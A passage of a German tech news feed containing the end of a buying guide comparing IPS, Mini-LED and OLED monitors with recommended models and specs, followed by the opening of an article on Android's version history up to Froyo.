<p>Die Eier legende Wollmilchsau gibt es nämlich leider immer noch nicht: Was beim nächtlichen Zocken für offene Münder sorgt, kann Sie beim morgendlichen Excel-Marathon im hell erleuchteten <a href="https://www.pcwelt.de/article/1187460/home-office-29-tipps-fuer-die-arbeit-von-zuhause.html" target="_blank" rel="noreferrer noopener">Homeoffice</a> schnell im Stich lassen. </p>



<p>Damit Sie beim Upgrade nicht in technische Fettnäpfchen treten, dröseln wir die Stärken und Schwächen der drei wichtigsten Technologien auf und geben eine Kaufberatung für die unterschiedlichen Modelltypen.</p>



<h2 class="wp-block-heading">Die drei Panel-Technologien im Alltags-Check</h2>



<p>Um das Maximum aus Ihrem Budget herauszuholen, sollten Sie die Charakteristiken der Panel-Typen kennen. Jede Technik hat ein optimales Einsatzgebiet.</p>



<h2 class="wp-block-heading">1. Der IPS-Monitor: Unkomplizierter Allrounder für den Alltag</h2>



<p>IPS (In-Plane Switching) gilt seit Jahren als der vernünftige Alleskönner unter den Display-Technologien. Die Technologie ist ausgereift, langlebig und bietet hervorragende Farbtreue sowie extrem stabile Blickwinkel. Egal, ob Sie schräg vor dem Monitor sitzen oder ein Kollege von der Seite daraufblickt: Die Farben verfälschen sich nicht. </p>



<p>Das größte Manko dieser Technik ist jedoch der systembedingte Kontrast. Weil hier eine dauerhafte Hintergrundbeleuchtung durch die Flüssigkristalle scheint, schimmert Schwarz im dunklen Raum eher dunkelgrau (<strong>IPS-Glow</strong>).</p>



<h3 class="wp-block-heading">Für wen eignen sich IPS-Displays?</h3>



<p>Dieser Displaytyp ist ideal fürs Homeoffice, klassische Büroarbeiten, Bildbearbeitung und Gelegenheitsspieler, die einen zuverlässigen Monitor ohne das Risiko von Einbrenneffekten suchen.</p>



<h2 class="wp-block-heading">Produktempfehlung: LG UltraGear 27GR75Q-B</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51eddec11d4"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/LG-Electronics-27GR75Q-B.jpg?quality=50&amp;strip=all&amp;w=754" alt="LG Electronics 27GR75Q-B" class="wp-image-3168001" width="754" height="1199" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">LG</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0BVWMSP1V?tag=pcwelt.de-21&amp;ascsubtag=4-0-3167989-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3167989-7-0-0-0-0">LG UltraGear 27GR75Q-B bei Amazon ansehen</a></div>


<p>Preis: ca. 299 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 27 Zoll (68,5 cm), Seitenverhältnis 16:9</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> WQHD (2.560 × 1.440 Pixel), IPS-Panel</li>



<li><strong>Farbraum &amp; Helligkeit:</strong> 99 % sRGB-Abdeckung, HDR10-Unterstützung, maximale Helligkeit 300 Nits</li>



<li><strong>Bildwiederholrate &amp; Reaktionszeit:</strong> 165 Hz nativ, 1 ms</li>



<li><strong>Synchronisation:</strong> AMD FreeSync Premium, Nvidia G-Sync Compatible</li>



<li><strong>Ergonomie-Funktionen:</strong> Höhenverstellbar, neigbar, schwenkbar, Pivot-Funktion (90-Grad-Drehung)</li>



<li><strong>Zusatzfunktionen:</strong> Flicker-Safe-Hintergrundbeleuchtung, Blaulichtreduktion (Reader Mode), softwarebasierte Menüsteuerung (OnScreen Control)</li>



<li><strong>Anschlüsse:</strong> 1 × DisplayPort 1.4, 2 × HDMI (Version herstellerseitig nicht spezifiziert), 1 × 3,5-mm-Klinkenanschluss (Kopfhörer)</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0BVWMSP1V?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">LG UltraGear 27GR75Q-B</a> bedient die im Consumer-Bereich weitverbreitete Kombination aus 27-Zoll-Diagonale und WQHD-Auflösung. Das verbaute IPS-Panel bietet eine Pixeldichte, die für eine angenehm scharfe Textdarstellung im Büroalltag sorgt, während die Bildwiederholrate von 165 Hz flüssige Bildbewegung beim Gaming verspricht. </p>



<p>Mit einer herstellerseitig angegebenen sRGB-Farbraumabdeckung von 99 Prozent eignet sich das Modell auch für grundlegende Bildbearbeitungen im semiprofessionellen Bereich.</p>



<h2 class="wp-block-heading">2. Mini-LED-Monitore: HDR-Leuchtkraft für helle Räume</h2>



<p>Mini-LED ist die Evolution des klassischen LCD-Monitors. Statt einiger großer Leuchtdioden sitzen dabei jedoch tausende winzige LEDs hinter dem Panel, die in hunderten separaten Zonen geregelt werden können (<strong>Local Dimming</strong>). </p>



<p>Der Effekt: Wo das Bild besonders dunkel sein soll, können die entsprechenden Dimmzonen stark heruntergeregelt oder sogar abgeschaltet werden. Das sorgt für fantastische Kontraste und eine beeindruckende Spitzenhelligkeit, die echtes, blendendes HDR ermöglicht. </p>



<p><strong>Der Nachteil</strong>: Um helle Objekte auf dunklem Grund (wie den Mauszeiger) kann ein minimaler Lichtkranz entstehen (<strong>Blooming</strong>).</p>



<h3 class="wp-block-heading">Für wen eignen sich Mini-LED-Monitore?</h3>



<p>Besonders in hellen Räumen spielt Mini-LED seine Stärken aus. Die Technik eignet sich außerdem für ambitionierte Gamer und Film-Enthusiasten, die spektakuläre HDR-Effekte ohne Kompromisse bei der Helligkeit erleben möchten.</p>



<h2 class="wp-block-heading">Produktempfehlung: AOC Gaming Q27G3XMN</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51eddec2324"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/AOC-Gaming-Q27G3XMN.jpg?quality=50&amp;strip=all&amp;w=1100" alt="AOC Gaming Q27G3XMN" class="wp-image-3168006" width="1100" height="1199" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">AOC </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0CNRPGQBG?tag=pcwelt.de-21&amp;ascsubtag=4-0-3167989-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3167989-7-0-0-0-0">AOC Gaming Q27G3XMN bei Amazon ansehen</a></div>


<p>Preis: 259 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 27 Zoll (68,6 cm), Seitenverhältnis 16:9, mattes Display</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> QHD (2.560 × 1.440 Pixel), VA-Panel</li>



<li><strong>Hintergrundbeleuchtung:</strong> Mini-LED-Technologie mit 336 lokalen Dimmzonen (Local Dimming)</li>



<li><strong>Kontrast &amp; Helligkeit:</strong> Statischer Kontrast 3.000:1, maximale Spitzenhelligkeit 1.000 Nits</li>



<li><strong>HDR-Zertifizierung:</strong> VESA Certified DisplayHDR 1000</li>



<li><strong>Bildwiederholrate &amp; Reaktionszeit:</strong> 180 Hz nativ, 1 ms</li>



<li><strong>Synchronisation:</strong> AMD FreeSync Premium Pro</li>



<li><strong>Ergonomie-Funktionen:</strong> 130 mm höhenverstellbar, Pivot-Funktion (90-Grad-Drehung), abnehmbarer Standfuß, VESA-Wandhalterung kompatibel (100 x 100 mm)</li>



<li><strong>Zusatzfunktionen:</strong> Flicker-Free-Hintergrundbeleuchtung, Blaulichtreduktion (Low Blue Light), herstellereigene Konfigurationssoftware (AOC G-Menu)</li>



<li><strong>Anschlüsse:</strong> 1 × DisplayPort 1.4, 2 × HDMI 2.0, 1 × 3,5-mm-Klinkenanschluss (Kopfhörer)</li>



<li><strong>Lieferumfang &amp; Service:</strong> Monitor, Stromkabel, HDMI-Kabel, DisplayPort-Kabel, Treiber-CD, 3 Jahre Herstellergarantie</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0CNRPGQBG?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">AOC Gaming Q27G3XMN</a> platziert sich als vergleichsweise günstiger Einstieg in die Mini-LED-Technologie. Durch die VESA-Zertifizierung nach dem DisplayHDR-1000-Standard liefert das Panel eine deutlich höhere Spitzenhelligkeit und Dynamik als klassische IPS-Monitore ohne lokales Dimming. 336 separate Dimmzonen ermöglichen eine selektive Abschaltung der Hintergrundbeleuchtung, womit der Kontrast bei der Darstellung von HDR-Inhalten im Vergleich zu herkömmlichen Edge-LED-Modellen sichtbar steigt.</p>



<h2 class="wp-block-heading">3. OLED-Monitore: Das visuelle Nonplusultra mit perfektem Schwarz</h2>



<p>OLED-Monitore sind der Traum vieler Gamer und <a href="https://www.pcwelt.de/article/3149575/smart-tv-heimkino-upgrades.html" target="_blank" rel="noreferrer noopener">Heimkino-Enthusiasten</a>. Weil hier jedes Pixel als winziges, selbstleuchtendes Element agiert, benötigt OLED keine Hintergrundbeleuchtung. Wird ein Pixel abgeschaltet, ist es absolut schwarz. Das resultiert in unendlichem Kontrast und einer Bildtiefe, die keine andere Technik erreicht. </p>



<p>Hinzu kommen Reaktionszeiten nahe dem theoretischen Nullpunkt. Allerdings erreichen OLED-Monitore bei großflächigen Bildinhalten meist nicht die Dauerhelligkeit hochwertiger Mini-LED-Displays. Bei statischen Inhalten (wie Excel-Tabellen oder Taskleisten) besteht auf Dauer zudem ein theoretisches Risiko für Einbrenneffekte (<strong>Burn-In</strong>). Solche Monitore setzen deshalb auf verschiedene Schutzmechanismen wie Pixel-Refresh, Pixel-Shift oder automatische Helligkeitsanpassungen.</p>



<h3 class="wp-block-heading">Für wen eignet sich die OLED-Technik?</h3>



<p>Für Hardcore-Gamer, Cineasten und Nutzer, die primär in abgedunkelten Räumen arbeiten oder spielen und die absolut beste Bildqualität suchen.</p>



<h2 class="wp-block-heading">Produktempfehlung: Asus ROG Swift OLED PG27AQDM</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51eddec3099"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ASUS-ROG-Swift-OLED-PG27AQDM-27-Zoll-WQHD-Gaming-Monitor.jpg?quality=50&amp;strip=all&amp;w=1200" alt="ASUS ROG Swift OLED PG27AQDM - 27 Zoll WQHD Gaming Monitor" class="wp-image-3168008" width="1200" height="1013" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Asus</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0BXY85B9F?tag=pcwelt.de-21&amp;ascsubtag=4-0-3167989-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3167989-7-0-0-0-0">Asus ROG Swift OLED PG27AQDM bei Amazon ansehen</a></div>


<p>Preis: 600 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 26,5 Zoll (67,3 cm), Seitenverhältnis 16:9, Anti-Glare-Oberfläche (reflexionsarm)</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> WQHD (2.560 × 1.440 Pixel), 10-Bit-OLED</li>



<li><strong>Farbraum &amp; Farbtreue:</strong> 99 % DCI-P3-Farbraumabdeckung, sehr hohe Farbgenauigkeit (Delta E &lt; 2)</li>



<li><strong>Helligkeit:</strong> Maximale Spitzenhelligkeit von 1.000 Nits, optionale Funktion für gleichmäßige Helligkeitsbegrenzung</li>



<li><strong>Bildwiederholrate &amp; Reaktionszeit:</strong> 240 Hz nativ, 0,03 ms</li>



<li><strong>Synchronisation &amp; Input:</strong> Nvidia G-Sync Compatible, AMD FreeSync Premium, GameFast Input (Eingabeverzögerungs-Reduzierung)</li>



<li><strong>Panel-Schutz (Wärmemanagement):</strong> Integrierter, angepasster Kühlkörper (Heatsink), softwareseitige Spannungsoptimierung zur Verringerung des Burn-In-Risikos</li>



<li><strong>Ergonomie &amp; Bedienung:</strong> Standfuß mit flexiblen Verstellmöglichkeiten, Monitoreinstellungen über Windows-Software per Maus steuerbar</li>



<li><strong>Anschlüsse:</strong> DisplayPort 1.4, HDMI (Version herstellerseitig nicht spezifiziert), integrierter USB-Hub</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0BXY85B9F?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Asus ROG Swift OLED PG27AQDM</a> setzt auf die typischen Stärken der OLED-Technologie: konstruktionsbedingt perfektes Schwarz und extrem niedrige Reaktionszeiten von 0,03 Millisekunden. </p>



<p>In Kombination mit der hohen Bildwiederholrate von 240 Hertz eignet sich das Modell primär für schnelle, kompetitive Spiele. Um der typischen OLED-Problematik des Panel-Einbrennens (Burn-In) entgegenzuwirken, verbaut der Hersteller einen passiven Kühlkörper und nutzt eine softwareseitige Spannungsoptimierung, die die thermische Belastung der organischen Pixel im Betrieb reduzieren soll.</p>



<h2 class="wp-block-heading">Die drei Technologien im Vergleich</h2>



<p>Hier sehen Sie die Stärken und Schwächen im direkten Schlagabtausch, um die richtige Kaufentscheidung für Ihren Arbeitsplatz zu treffen:</p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><tbody><tr><td><strong>Kriterium</strong></td><td><strong>IPS-Panel</strong></td><td><strong>Mini-LED</strong></td><td><strong>OLED</strong></td></tr><tr><td><strong>Schwarzwert &amp; Kontrast</strong></td><td>Befriedigend (Grauschleier)</td><td>Sehr gut (leichtes Blooming)</td><td>Perfekt (Unendlicher Kontrast)</td></tr><tr><td><strong>Spitzenhelligkeit</strong></td><td>Gut (ca. 300–400 Nits)</td><td>Brillant (1.000+ Nits)</td><td>Sehr gut (ca. 400–1.000 Nits)</td></tr><tr><td><strong>Reaktionszeit</strong></td><td>Schnell (1–4 ms)</td><td>Schnell (1–4 ms)</td><td>Extrem schnell (0,03 ms)</td></tr><tr><td><strong>Blickwinkelstabilität</strong></td><td>Sehr hoch</td><td>Hoch</td><td>Extrem hoch</td></tr><tr><td><strong>Risiko für statische Inhalte</strong></td><td>Keines</td><td>Keines</td><td>Geringes Risiko (Burn-In-Schutz sinnvoll)</td></tr><tr><td><strong>Preis-Leistungs-Verhältnis</strong></td><td>Gut</td><td>Gut</td><td>Gehobene Preisklasse</td></tr></tbody></table></figure>



<h2 class="wp-block-heading">Software-Ergänzungskit: Mehr Komfort im Monitor-Alltag</h2>



<p>Ein Hardware-Upgrade ist nur die halbe Miete. Mit diesen drei kostenlosen Software-Tools holen Sie noch mehr aus Ihrem neuen Bildschirm heraus:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/de-de/windows/powertoys/install?tabs=gh%2Cextract-094" target="_blank" rel="noreferrer noopener"><strong>Microsoft PowerToys (FancyZones)</strong></a><strong>:</strong> Gerade bei großen oder ultra weiten Monitoren ist das Standard-Fensterlayout von Windows überfordert. Mit dem Modul <strong>FancyZones</strong> unterteilen Sie Ihren Bildschirm in feste, frei definierbare Raster, in die Sie Fenster mit gedrückter Shift-Taste blitzschnell einrasten lassen. Ein Must-Have für Multitasking.</li>



<li><a href="https://twinkletray.com/" target="_blank" rel="noreferrer noopener"><strong>Twinkle Tray</strong></a><strong>:</strong> Wer die Helligkeit seines Monitors nicht mühsam über die fummeligen Tasten direkt am Gehäuse verstellen möchte, steuert mit diesem Tool die Monitorhelligkeit ganz bequem per Mausrad oder Tastenkombination direkt aus der Windows-Taskleiste heraus.</li>



<li><a href="https://apps.microsoft.com/detail/xp8jk4hzbvf435?hl=de-DE&amp;gl=DE" target="_blank" rel="noreferrer noopener"><strong>Auto Dark Mode:</strong></a> Um bei OLED-Displays dauerhaft helle Oberflächen zu reduzieren und am Abend die Augen zu entlasten, schaltet dieses Tool Windows sowie kompatible Apps und Websites nach Sonnenuntergang automatisch in den dunklen Design-Modus.</li>
</ul>



<h2 class="wp-block-heading">Fazit: Welcher Monitor-Typ sind Sie?</h2>



<p>Das perfekte Monitor-Upgrade richtet sich immer nach Ihrem Nutzungsverhalten im Alltag: Wer einen treuen, langlebigen Partner sucht, der acht Stunden am Tag ohne Murren Office-Dokumente anzeigt und beim Budget nicht schmerzt, greift zum <strong>IPS-Klassiker</strong>. </p>



<p>Wer sich hingegen von spektakulären HDR-Effekten in Filmen und Spielen begeistern lassen will oder tagsüber in hellen Räumen arbeitet, findet im <strong>Mini-LED-Monitor</strong> einen hell leuchtenden Allrounder. Wenn kompromisslose Bildqualität, perfektes Schwarz und die schnellsten Reaktionszeiten beim Gaming im Vordergrund stehen, führt kein Weg am <strong>OLED-Panel</strong> vorbei – sofern das nötige Kleingeld vorhanden ist.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alle Android-Versionen im Überblick]]></title>
<description><![CDATA[Die Android-Versionshistorie ist – zumindest bis ins Jahr 2018 – mit süßen Versuchungen gepflastert.
					Foto: Olezzo – shutterstock.com




Googles mobiles Betriebssystem Android blickt auf bescheidene Anfänge zurück und wurde über die Jahre immens weiterentwickelt – sowohl auf optischer als au...]]></description>
<link>https://tsecurity.de/de/3661174/it-security-nachrichten/alle-android-versionen-im-ueberblick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661174/it-security-nachrichten/alle-android-versionen-im-ueberblick/</guid>
<pubDate>Sat, 11 Jul 2026 05:22:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die Android-Versionshistorie ist - zumindest bis ins Jahr 2018 - mit süßen Versuchungen gepflastert." title="Die Android-Versionshistorie ist - zumindest bis ins Jahr 2018 - mit süßen Versuchungen gepflastert." src="https://images.computerwoche.de/bdb/3392474/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die Android-Versionshistorie ist – zumindest bis ins Jahr 2018 – mit süßen Versuchungen gepflastert.</p></figcaption></figure><p class="imageCredit">
					Foto: Olezzo – shutterstock.com</p></div>




<p>Googles mobiles Betriebssystem <a href="https://www.computerwoche.de/article/2824401/die-besten-android-launcher.html" title="Android" target="_blank">Android</a> blickt auf bescheidene Anfänge zurück und wurde über die Jahre immens weiterentwickelt – sowohl auf optischer als auch konzeptioneller und funktioneller Ebene. Im Folgenden haben wir alle jemals erschienenen (relevanten) Android-Versionen im Zeitverlauf für Sie zusammengestellt – inklusive ihrer jeweiligen Highlights.</p>



<h2 class="wp-block-heading">Android 1.0/1.1</h2>



<p>Sein offizielles Debüt feierte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> mit Version 1.0 im Jahr 2008 – damals noch ohne aparten Codenamen mit Backwerk-Bezug. In der Smartphone-Frühzeit waren die Dinge bei Android vor allem eines: simpel.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Homescreen von Android 1.0 - und sein rudimentärer Webbrowser." title="Der Homescreen von Android 1.0 - und sein rudimentärer Webbrowser." src="https://images.computerwoche.de/bdb/3392475/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Homescreen von Android 1.0 – und sein rudimentärer Webbrowser.</p></figcaption></figure><p class="imageCredit">
					Foto: T-Mobile</p></div>




<p>Dennoch konnte das Google-Betriebssystem bereits mit integrierten Apps aufwarten, etwa Gmail, Google Maps, Kalender oder Youtube. Ein krasser Gegensatz zum heute gängigen (und besser aktualisierbaren) Standalone-App-Modell. </p>



<h2 class="wp-block-heading">Android 1.5 Cupcake</h2>



<p>Mit dem Release von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 1.5 begann Google, die Versionen seines Mobile OS nach teigigen Leckereien zu benennen. Eine Tradition, die über etliche Jahre Bestand haben sollte. Mit Cupcake hielten diverse Optimierungen der Benutzeroberfläche Einzug – unter anderem in Form der ersten virtuellen Bildschirmtastatur.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Bei Android Cupcake rückte Google Widgets in den Fokus." title="Bei Android Cupcake rückte Google Widgets in den Fokus." src="https://images.computerwoche.de/bdb/3392476/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Bei Android Cupcake rückte Google Widgets in den Fokus.</p></figcaption></figure><p class="imageCredit">
					Foto: Android Police</p></div>




<p>Vor allem führte Google mit Cupcake aber das Framework für Drittanbieter-App-Widgets ein, was sich schnell zu einem <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Alleinstellungsmerkmal entwickelte. Mit Android Version 1.5 war es außerdem erstmals möglich, auch Videoaufnahmen zu realisieren.</p>



<h2 class="wp-block-heading">Android 1.6 Donut</h2>



<p>Im Herbst 2009 erblickte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 1.6 – Codename Donut – das Licht der Welt. Diese Android-Version optimierte Googles mobiles Betriebssystem weiter, zum Beispiel mit Support für diverse verschiedene Bildschirmauflösungen und -formate. Ein besonders zukunftskritisches Feature für Android hielt mit der Unterstützung des Mobilfunkstandards <a href="https://de.wikipedia.org/wiki/Codemultiplexverfahren" title="CDMA" target="_blank" rel="noopener">CDMA</a> Einzug. Letzteres begünstigte die folgende explosionsartige Ausbreitung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt." title="Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt." src="https://images.computerwoche.de/bdb/3392477/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<h2 class="wp-block-heading">Android 2.0/2.1 Eclair</h2>



<p>Nur sechs Wochen nach Donut ließ Google <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 2.0 mit dem Codenamen Eclair auf die Nutzer los – einige Monate später folgte das 2.1-Update. Das erste Smartphone, das diese Android-Version nutzte, war Motorolas Milestone. Das Smartphone wurde in den USA unter der Bezeichnung “<a href="https://www.pcworld.com/article/521008/droid_sales_and_the_android_explosion.html" title="Droid" target="_blank">Droid</a>” vermarktet und sollte den technikaffinen Gegenpol zu Apples <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> bilden – zumindest legte das die relativ aggressive Marketingkampagne in den USA nahe:</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p>Bei Apple dürfte jedoch vor allem <a href="https://www.computerworld.com/article/1515386/steve-jobs-called-for-holy-war-against-google.html" title="für Verstimmung gesorgt haben" target="_blank">für Verstimmung gesorgt haben</a>, dass mit Eclair auch die bis dahin iOS-exklusive “Pinch-to-Zoom”-Funktionalität in <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> eingeführt wurde. Die revolutionärsten Elemente dieser Android-Version waren jedoch sprachgesteuerte Turn-by-Turn-Navigation und Verkehrsinformationen in Echtzeit – bis dahin nicht realisierte Features in der Smartphone-Welt. Darüber hinaus hielten mit Eclair auch Live-Hintergrundbilder sowie die erste Speech-to-Text-Funktion Einzug. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die erste Navigations- und Diktierfunktion in Android 2.0." title="Die erste Navigations- und Diktierfunktion in Android 2.0." src="https://images.computerwoche.de/bdb/3392478/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die erste Navigations- und Diktierfunktion in Android 2.0.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<h2 class="wp-block-heading">Android 2.2 Froyo</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 2.2 widmete sich Google (vier Monate nach dem Release von Version 2.1) hauptsächlich Performance-Optimierungen unter der Haube. Android Froyo erweiterte jedoch die Benutzeroberfläche um einige praktische Funktionen – darunter das inzwischen zum Standard gewordene Dock am unteren Rand des Startbildschirms sowie die erste Version von Voice Actions. Letzteres erlaubte den Benutzern, einige grundlegende Funktionen wie Wegbeschreibungen oder Notizen abzurufen, indem sie ein Icon antippen und anschließend einen Sprachbefehl folgen lassen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone." title="Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone." src="https://images.computerwoche.de/bdb/3392479/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




